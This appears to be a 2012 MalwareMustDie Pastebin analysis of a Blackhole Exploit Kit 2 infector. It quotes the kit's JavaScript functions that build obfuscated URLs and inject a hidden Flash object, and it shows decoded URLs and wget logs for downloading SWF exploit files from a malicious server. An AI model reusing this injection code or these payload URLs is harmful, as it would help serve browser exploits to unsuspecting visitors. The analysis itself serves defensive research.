Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- =======================================
- GET THE SWF EXPLOITER & INFECTOR
- TEHRE ARE 2(TWO) FUNCTIONS RELATED...
- #MalwareMustDie | @unixfreaxjp ~]$ date
- Sun Nov 25 20:50:32 JST 2012
- =======================================
- //There is also two swf downloader function :
- function getCN()
- {
- return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
- }
- //let's crack the url provided in the function by the above method, result is the below download of SWF Exploit file :
- http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
- // download:
- --17:24:41-- http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
- => `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe'
- Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
- Connecting to delemiator.ru|208.87.243.131|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 5,969 (5.8K) [text/html]
- 17:24:43 (128.15 MB/s) - `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe' saved [5969/5969]
- // Here is another one ff2() to bring you to another download url, see below decoding process..
- function ff2()
- {
- var oSpan=document.createElement("span");
- var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
- oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
- <param name='movie' value='"+url+"' />
- <param name='allowScriptAccess' value='always' />
- <param name='Play' value='0' />
- <embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
- </embed></object>";
- document.body.appendChild(oSpan);
- }
- // focus into this: var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
- // with "yxjk" is "3m:3l:37:38" we get the download url below, to download another
- http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
- --17:35:50-- http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
- => `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo'
- Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
- Connecting to delemiator.ru|208.87.243.131|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 3,043 (3.0K) [text/html]
- 17:35:52 (87.29 MB/s) - `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo' saved [3043/3043]
- // The further hack into this BHEK2 infector show us that the static path of these two SWF
- // infectors also exists as per below links with download PoC:
- --17:39:41-- http://delemiator.ru:8080/forum/data/field.swf
- => `field.swf'
- Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
- Connecting to delemiator.ru|202.180.221.186|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 3,043 (3.0K) [application/x-shockwave-flash]
- 17:39:44 (89.55 MB/s) - `field.swf' saved [3043/3043]
- --17:39:54-- http://delemiator.ru:8080/forum/data/score.swf
- => `score.swf'
- Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
- Connecting to delemiator.ru|202.180.221.186|:8080... connected.
- HTTP request sent, awaiting response... 200 OK
- Length: 5,969 (5.8K) [application/x-shockwave-flash]
- 17:39:56 (42.54 MB/s) - `score.swf' saved [5969/5969]
- #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement